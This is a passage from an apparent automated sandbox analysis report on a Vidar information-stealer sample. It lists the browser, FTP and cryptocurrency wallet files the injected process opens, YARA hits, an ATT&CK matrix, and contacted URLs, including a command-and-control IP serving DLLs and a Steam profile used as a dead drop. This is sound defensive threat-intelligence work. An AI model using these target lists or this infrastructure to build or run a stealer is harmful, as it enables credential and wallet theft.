                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                      Source: Yara matchFile source: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Vidar
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 0.2.file.exe.3ec5570.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.3ec5570.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C930C40 sqlite3_bind_zeroblob,3_2_6C930C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C930D60 sqlite3_bind_parameter_name,3_2_6C930D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C858EA0 sqlite3_clear_bindings,3_2_6C858EA0

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API                      		Boot or Logon Initialization Scripts511
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Credentials in Registry                      		1
                      Account Discovery                      		Remote Desktop Protocol4
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Command and Scripting Interpreter                      		Logon Script (Windows)Logon Script (Windows)3
                      Obfuscated Files or Information                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Screen Capture                      		3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                      Software Packing                      		NTDS54
                      System Information Discovery                      		Distributed Component Object ModelInput Capture114
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets151
                      Security Software Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials2
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Virtualization/Sandbox Evasion                      		DCSync12
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                      Process Injection                      		Proc Filesystem1
                      System Owner/User Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417473 Sample: file.exe Startdate: 29/03/2024 Architecture: WINDOWS Score: 100 29 steamcommunity.com 2->29 35 Found malware configuration 2->35 37 Antivirus detection for URL or domain 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 9 other signatures 2->41 7 file.exe 1 2->7         started        signatures3 process4 signatures5 43 Contains functionality to inject code into remote processes 7->43 45 Writes to foreign memory regions 7->45 47 Allocates memory in foreign processes 7->47 49 Injects a PE file into a foreign processes 7->49 10 RegAsm.exe 36 7->10         started        15 RegAsm.exe 7->15         started        17 WerFault.exe 21 16 7->17         started        19 conhost.exe 7->19         started        process6 dnsIp7 31 78.46.229.36, 443, 49732, 49736 HETZNER-ASDE Germany 10->31 33 steamcommunity.com 104.112.44.153, 443, 49731 AKAMAI-ASUS United States 10->33 21 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 10->21 dropped 23 C:\Users\user\AppData\...\softokn3[1].dll, PE32 10->23 dropped 25 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 10->25 dropped 27 10 other files (none is malicious) 10->27 dropped 51 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 10->51 53 Found many strings related to Crypto-Wallets (likely being stolen) 10->53 55 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->55 59 4 other signatures 10->59 57 Searches for specific processes (likely to inject) 15->57 file8 signatures9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      file.exe29%VirustotalBrowse
                      file.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\ProgramData\freebl3.dll0%ReversingLabs
                      C:\ProgramData\freebl3.dll0%VirustotalBrowse
                      C:\ProgramData\mozglue.dll0%ReversingLabs
                      C:\ProgramData\mozglue.dll0%VirustotalBrowse
                      C:\ProgramData\msvcp140.dll0%ReversingLabs
                      C:\ProgramData\nss3.dll0%ReversingLabs
                      C:\ProgramData\softokn3.dll0%ReversingLabs
                      C:\ProgramData\vcruntime140.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://mozilla.org0/0%URL Reputationsafe
                      https://78.46.229.36/msvcp140.dllxE100%Avira URL Cloudmalware
                      https://78.46.229.36/Hos100%Avira URL Cloudmalware
                      https://78.46.229.36/U&100%Avira URL Cloudmalware
                      https://78.46.229.36/msvcp140.dll100%Avira URL Cloudmalware
                      https://78.46.229.36/~&100%Avira URL Cloudmalware
                      https://78.46.229.36/100%Avira URL Cloudmalware
                      https://78.46.229.36/mozglue.dll100%Avira URL Cloudmalware
                      https://78.46.229.36/softokn3.dll100%Avira URL Cloudmalware
                      https://78.46.229.36/freebl3.dll100%Avira URL Cloudmalware
                      https://78.46.229.36/ramData100%Avira URL Cloudmalware
                      https://78.46.229.36/nss3.dll100%Avira URL Cloudmalware
                      https://78.46.229.36/mozglue.dll2E100%Avira URL Cloudmalware
                      https://78.46.229.36/p&100%Avira URL Cloudmalware
                      https://78.46.229.36HIJKF0%Avira URL Cloudsafe
                      https://78.46.229.36100%Avira URL Cloudmalware
                      https://78.46.229.36/msvcp140.dllnE100%Avira URL Cloudmalware
                      https://78.46.229.362%VirustotalBrowse
                      https://78.46.229.36/nes100%Avira URL Cloudmalware
                      https://78.46.229.36/softokn3.dllBE100%Avira URL Cloudmalware
                      https://78.46.229.36/vcruntime140.dll100%Avira URL Cloudmalware
                      https://78.46.229.36IDGIE0%Avira URL Cloudsafe
                      https://78.46.229.36/d100%Avira URL Cloudmalware
                      https://78.46.229.36/2%VirustotalBrowse
                      https://78.46.229.36/sqlm.dll100%Avira URL Cloudmalware
                      https://78.46.229.36/g100%Avira URL Cloudmalware
                      https://78.46.229.36/2100%Avira URL Cloudmalware
                      https://78.46.229.36/B100%Avira URL Cloudmalware
                      https://78.46.229.36JEBKE0%Avira URL Cloudsafe
                      https://78.46.229.36/sqlm.dll0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      steamcommunity.com
                      		104.112.44.153
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://78.46.229.36/msvcp140.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://78.46.229.36/mozglue.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://78.46.229.36/true
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        https://78.46.229.36/softokn3.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://78.46.229.36/freebl3.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://78.46.229.36/nss3.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://78.46.229.36/vcruntime140.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://78.46.229.36/sqlm.dlltrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        https://steamcommunity.com/profiles/76561199658817715false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabECFHIJKJ.3.drfalse
                            		high
                            https://duckduckgo.com/ac/?q=ECFHIJKJ.3.drfalse
                              		high
                              https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                		high
                                https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=swtsTjCD0CFZ&ampRegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                  		high
                                  https://78.46.229.36/HosRegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                    		high
                                    https://78.46.229.36/~&RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engliRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                      		high
                                      https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                        		high
                                        https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpERegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                          		high
                                          https://steamcommunity.com/profiles/76561199658817715/badgesRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                            		high
                                            http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                              		high
                                              https://78.46.229.36/U&RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://78.46.229.36/msvcp140.dllxERegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeRegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                  		high
                                                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=kMVERegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                    		high
                                                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                      		high
                                                      https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                        		high
                                                        https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                          		high
                                                          https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                            		high
                                                            http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.drfalse
                                                              		high
                                                              https://mozilla.org0/nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                		high
                                                                https://steamcommunity.com/gRegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                    		high
                                                                    https://store.steampowered.com/points/shop/RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                      		high
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ECFHIJKJ.3.drfalse
                                                                        		high
                                                                        https://78.46.229.36/ramDataRegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://steamcommunity.com/profiles/76561199658817715cRegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGIDAAFI.3.drfalse
                                                                            		high
                                                                            https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                              		high
                                                                              https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                		high
                                                                                https://www.ecosia.org/newtab/ECFHIJKJ.3.drfalse
                                                                                  		high
                                                                                  https://78.46.229.36/mozglue.dll2ERegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://78.46.229.36/p&RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brIIJDBGDGCGDAKFIDGIDBFIEHDH.3.drfalse
                                                                                    		high
                                                                                    https://78.46.229.36HIJKFRegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		low
                                                                                    https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                      		high
                                                                                      https://78.46.229.3676561199658817715[1].htm.3.drfalse
                                                                                      • 2%, Virustotal, Browse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://78.46.229.36/msvcp140.dllnERegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                        		high
                                                                                        https://78.46.229.36/nesRegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                          		high
                                                                                          https://78.46.229.36/softokn3.dllBERegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                              		high
                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                		high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesEGIDAAFI.3.drfalse
                                                                                                  		high
                                                                                                  https://store.steampowered.com/about/76561199658817715[1].htm.3.drfalse
                                                                                                    		high
                                                                                                    https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                      		high
                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFIIJDBGDGCGDAKFIDGIDBFIEHDH.3.drfalse
                                                                                                        		high
                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                          		high
                                                                                                          https://help.steampowered.com/en/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                            		high
                                                                                                            https://78.46.229.36IDGIERegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		low
                                                                                                            https://steamcommunity.com/market/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                              		high
